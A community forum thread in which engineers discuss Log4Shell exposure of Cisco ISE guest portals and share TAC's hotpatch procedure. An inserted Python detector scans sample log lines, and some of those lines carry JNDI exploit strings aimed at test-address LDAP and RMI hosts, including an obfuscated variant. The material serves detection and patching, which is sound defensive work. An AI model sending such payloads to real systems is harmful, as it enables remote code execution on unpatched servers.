Regarding CSCwa47133; CVE-2021-44228 - Apache Log4j2 JNDI and ISE vuln

Mats Nilson
Level 1

Hello fellow engineers/consultants.

Have anyone seen the impact on ISE related to Guest portals and authentication?

CVE-2021-44228 - Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

 

We have a setup of ISE appliances with Guest portals assigned to separate public interfaces and the authentication/authorisation is split to separate inside interfaces. No LDAP/AD authentication is involved.

 

Will it still be possible for an attacker on the public side to execute against this vulnerability?

Any suggestion is welcomed


Leo Laohoo
Hall of Fame

The list of affected products can be found here: Vulnerability in Apache Log4j Library Affecting Cisco Products

Fixes are not yet out.  

Hi Leo.

 

Yes, I have read these, but do you have any idea if it is possible for an attack over different portals on different interfaces in the same appliance?

 

Sincere Regards

//Mats

Best answer is to raise a TAC Case.  

Proper information is currently very scarce.

Evelyn Riha
Level 1

As far as I understand the issue, the attack is running over HTTP traffic. And it doesn't matter if you use LDAP; this is a log4j issue, and ISE is running the affected software component (Java + log4j). You can even try blocking outgoing LDAP traffic from ISE, but the requests may also be seen as DNS or RMI traffic.

So in short: ISE with Guest Portals is highly at risk.

Thanks Evelyn.

At least we have separated PSN from PAN nodes and the PSN are not managed on the same interface as the guest portals. Probably the best workaround for now is to have more stringent firewall rules. I got a heads up that Cisco developers are working on a fix now.

What does "ISE with Guest Portals" mean?

For Guest authentication you can use a technology called CWA (Centralized Web Authentication), where the ISE acts as an external web portal and lets the guest user do the authentication and authorization in ISE, and the result is sent back to the WLC as a CoA (Change of Authorization).

There are very good guidelines and documentation for this.

No, the attack exploits logging handled by log4j. This could be in any form: a username, an SMS, an Apple iMessage, HTTP headers.

If a string is handled by log4j in the vulnerable format, then Java will download a class and run it.

 

The exploit can also extract info from the environment in a DNS request, i.e. extract cloud secrets, etc.
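As an added defender-side illustration (not code from this thread or from Cisco), the following Python scans constructed guest-portal access log lines for the JNDI lookup pattern in the user-supplied fields Evelyn mentions (username, HTTP headers); the log format, field names and addresses are assumed, and the lookup schemes checked are the ones named in the thread (LDAP, RMI, DNS).

```python
import re
from typing import List, Optional, Tuple

# Log4j evaluates nested lookups before the outer one, so a "${jndi:" prefix
# can be split across ${lower:...}/${upper:...} wrappers. Collapse those first.
NESTED_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)

# The lookup itself: "${jndi:<scheme>:" with the schemes discussed in the thread.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Strip nested case-conversion wrappers, e.g. ${${lower:j}ndi:x} -> ${jndi:x}."""
    for _ in range(max_rounds):
        flattened = NESTED_CASE.sub(lambda m: m.group(1), text)
        if flattened == text:
            break
        text = flattened
    return text


def find_jndi(text: str) -> Optional[str]:
    """Return the JNDI scheme found in the (normalized) text, or None."""
    match = JNDI_LOOKUP.search(normalize(text))
    return match.group(1).lower() if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, scheme) for every line carrying a JNDI lookup."""
    return [(i, s) for i, line in enumerate(lines) if (s := find_jndi(line))]


# Constructed sample guest-portal access log (assumed format; RFC 5737 test addresses).
SAMPLE_LOGS = [
    'GET /portal/LoginSubmit.action user="alice" ua="Mozilla/5.0"',
    'GET /portal/LoginSubmit.action user="${jndi:ldap://198.51.100.7:1389/a}" ua="Mozilla/5.0"',
    'GET /portal/PortalSetup.action user="-" ua="${${lower:j}ndi:rmi://203.0.113.5:1099/x}"',
    'GET /portal/LoginSubmit.action user="bob" ua="curl/7.68.0"',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {scheme} -> {SAMPLE_LOGS[idx]}")
```

A hit is an indicator of attempted exploitation rather than proof of compromise; the hotpatch (and egress filtering of the LDAP/RMI/DNS callbacks) is what actually closes the hole.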

Leo Laohoo
Hall of Fame

Patch can be found HERE.

Release Notes (for the patch) can be found HERE.

NOTE: Patch only applies to ISE 2.4, 2.6, 2.7 or 3.0.

Thanks Leo!

 

I will consider this thread as solved.

Cisco TAC hasn't yet responded or given new advice in our open case.

We'll probably await further input from TAC before proceeding though.

 

Many thanks for the heads up

 

Sincere Regards

//Mats

Mats Nilson
Level 1

Please note for all of you the correct procedure:

(Given to me by TAC)

 

First of all, you can find the hotfix and the rollback patch by referring to the link below:
https://software.cisco.com/download/home/283801620/type/283802505/release/Log4j2-fix-2.4-3.0?catid=268438162

Hot patch file : “ise-apply-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz”

Rollback file : “ise-rollback-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz”

 

Please keep in mind that the hotpatch is mandatory on all the nodes in your deployment, so you will need to install it on all of the nodes; it can be applied to ISE versions 2.4-3.0.

 

To install it, we first need to upload the files into a reachable repository on ISE, then install it from the CLI using the command below:

 

ISE2_2/admin# application install ise-apply-CSCwa47133_Ver_24_30_allpatches-SPA.tar.gz <repository_name>

Save the current ADE-OS running configuration? (yes/no) [yes] ? yes

Generating configuration...

Saved the ADE-OS running configuration to startup successfully

 

Execute the above in all the nodes in your deployment.

 

Please keep in mind that installing the hotpatch will cause a restart of the ISE services, so you will need to do it in a maintenance window after working hours to avoid any network-down situation.

 

In case you want to upgrade the ISE version or patch, there will be no need to roll back the hot patch; you can install patches and upgrade on top of the fix.

 

After the patch upgrade, you want to verify that it has been installed successfully:

 

ise-01/admin# show logging application hotpatch.log
Thu Dec 16 10:33:57 CET 2021 => CSCwa47133_all_common_1 => CSCwa47133

------------------------

 

So you must expect that all services will restart, but not the server itself. So arrange for a maintenance window.

Sincere Regards

//Mats

Mats Nilson
Level 1

Just a minor feedback:

Someone did post a statement regarding hotpatches and ISE and that they must be removed prior to installing ordinary patches.

- That is wrong, or at least with the Log4j2 patch!

I did a checkup with TAC and they say it is not required and that new patches can be installed on top of this hotfix:

"please note that as per the developers there is no need to rollback the hot patch and you can install patches and upgrade on top of the fix. For more information, please refer to the below read me guide :
https://www.cisco.com/web/software/283802505/159582/README_Hotpatch_CSCwa47133_Log4j2-fix-2.4-3.0.txt "

 

Regards

//Mats